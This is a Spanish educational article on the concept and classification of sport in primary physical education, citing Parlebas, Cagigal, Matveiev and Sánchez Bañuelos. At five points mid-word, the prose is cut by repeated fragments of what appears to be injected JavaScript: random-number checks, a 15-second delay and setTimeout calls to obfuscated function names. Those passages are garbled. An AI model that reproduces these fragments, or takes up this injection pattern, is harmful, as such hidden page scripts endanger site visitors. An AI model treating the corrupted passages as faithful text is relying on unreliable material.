EL DEPORTE: CONCEPTO Y CLASIFICACIÓN EN LA EDUCACIÓN FÍSICA EN EDUCACIÓN PRIMARIA

Autora: Miryan Santos Pizarro

          El concepto de deporte ha ido variandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando con el discurrir del tiempo y en función de la evolución de las sociedades en que se ha desarrollado.

          Si tuviéramos que destacar unos rasgos o una virtud común, o por lo menos predominante, veríamos la persistencia de lo que es esencial en el juego: alegría, diversión, pasatiempo, representación de algo ficticio… Pero la observación de la forma en que se desarrolla el deporte nos lleva a incorporar el “sentido agonístico” de su realización.

          Para completar la idea anterior, se exponen varias definiciones, que no todas concuerdan exactamente. Según las tendencias de las diferentes “escuelas” de donde dimanan, las definiciones recalcan uno u otro de los diversos factores que conforman la acción deportiva:

         El Diccionario de la Real Academia de la Lengua Española entiende por deporte: “Actividad lúdica, sujeta a reglas fijas controladas por organismos internacionales, que se practica en forma de competición individual o colectiva, y que pone en juego cualidades tales como la movilidad física, la fortaleza y la habilidad de los competidores”.

         P. PARLEBAS, define el deporte como “conjunto de situaciones motrices codificadas en forma de competición y con un carácter institucional”. Son tres los principales componentes que aparecen en esta definición:

-  Situación motriz: es el conjunto de datos objetivos (espacios, instrumentos, reglamentos) que caracterizan la acción motriz de uno o varios sujetos, que en un medio físico dado realizan una acción táctica. Dentro de las situaciones motrices se distinguen:

  • Situación Psicomotriz: Es aquella que es realizada para un solo sujeto y, por lo tanto, no existe comunicación práctica.
  • Situación Sociomotriz. Es aquella que es realizada con otros sujetos, por lo tanto, hay presencia de comunicación práctica. Es directa cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando se realiza con un compañero/s o adversario, e indirecta por medio de los gestos o conductas motrices.

-          Competición reglada. Reglas codificadas y estandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andarizadas.

-           Situación motriz institucionalizada. Por medio de instituciones oficiales que dirigen el deporte (CONSEJO SUPERIOR DE DEPORTES, FEDERACIONES INTERNACIONALES, COMITÉ OLIMPICO INTERNACIONAL…).

          CAGIGAL, J.M. (1981), lo define como “Diversión liberal, espontánea, desinteresada, expresión del espíritu y del cuerpo, generalmente en forma de lucha, por medio de ejercicios físicos más o menos sometidos a reglas”. En esta definición aparecen los conceptos de ejercicio físico, lucha y reglas como características del deporte.

          A través de un análisis de las definiciones expuestas, quedan patentes algunas características esenciales de la actividad física para ser considerada deporte: participación física, búsqueda del máximo rendimiento, gratuidad y reglamentación.


          Clasificaciones más rigurosas son las que exponemos a continuación de MATVEIVEV, SÁNCHEZ BAÑUELOS Y P. PARLEBAS:

          MATLEIVEV, L.P. (1981), utiliza en su clasificación un criterio basado en el tipo de esfuerzo físico requerido para cada deporte, estableciendo cinco grupos.

  • Deportes acíclicos, son aquellos en los que predomina la fuerza veloz y los movimientos de máxima intensidad.
  • Saltos (gimnasia, trampolín, esquí, longitud)
  • Lanzamientos (jabalina, disco, peso y martillo)
  • Halterofilia
  • Velocidad (sprint)
  • Deportes con predominio de la resistencia.
  • Movimientos de intensidad submáxima (medio fondo, natación 100 y 400 metros.
  • Movimientos de intensidad superior y media (5000 y más metros y 800 y 1500 en natación)
  • Deportes de equipo.
  • Deportes de considerable intensidad, pero con la posibilidad de ser abandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andonado de tiempo en tiempo (baloncesto, hockey hielo)
  • Deportes de considerable duración con pocas interrupciones (fútbol, hockey hierba).
  • Deportes de combate; en ellos se da enfrentamientos directo entre individuos (esgrima, boxeo, lucha).
  • Deportes complejos y pruebas múltiples; son aquellos en los que se solicita al deportista esfuerzos muy diversos y amplios (penthalon moderno, decathlon, gimnasia deportiva).

SANCHEZ BAÑUELOS, F. (1984), distingue entre deportes básicos y deportes complejos.

1) Deportes básicos:

          Se encuentran relacionados con las habilidades y destrezas básicas y se suelen desarrollar en un entorno estable. La exigencia respecto a los mecanismos de percepción y decisión suele ser escasas, frente a los mecanismos de ejecución que suele ser elevada. Estos deportes generalmente son individuales, tales como el atletismo, la natación, tiro con arco…


2) Deportes complejos:

          Se desarrollan en entornos cambiantes y el control del movimiento es la regulación externa. Generalmente estos deportes implican actividades con un mayor número de componentes de ejecución, y el orden secuencial de las mismas puede ser variable de una situación a otra. Las exigencias en los tres mecanismos, percepción-decisión-ejecución, son bastante elevadas. Por ejemplo, el baloncesto, balonmano, voleibol….

          PARLEBAS, P. realiza una clasificación muy interesante y moderna cuyo principio está en la consideración de cualquier situación motriz como un sistema de interacción global entre un individuo que se mueve, el entorno físico y los otros participantes.

          El factor que determina cualquier situación es la noción de incertidumbre (inseguridad, inquietud). Esta incertidumbre puede ser debida bien al entorno físico que rodea a la actividad motriz, o a los adversarios o compañeros.

          Las situaciones en las que no existe incertidumbre, aquellas en las que el individuo actúa en solitario (lanzamiento de jabalina, salto de altura, etc.) se denominan situaciones “psicomotrices”. Aquellas en las que existe incertidumbre, debida al medio físico o a los compañeros o adversarios (deportes de equipo, lucha, frontón), son denominadas situaciones “sociomotrices”.

          Los criterios básicos de esta clasificación son la utilización de tres factores relacionados con la incertidumbre, en la relación entre el medio, el compañero y el adversario.


I) Incertidumbre provocada por la relación del participante con el medio exterior o entrono físico.

P) Incertidumbre en la interacción con el compañero/s o comunicación motriz.

A) Incertidumbre en la interacción con el adversario/s o contracomunicación motriz.

          Ello hace que cada situación pueda ser caracterizada en función de la existencia o no de incertidumbre en uno o varios de los parámetros considerados (la ausencia de incertidumbre se señala con un trazo encima del parámetro considerado).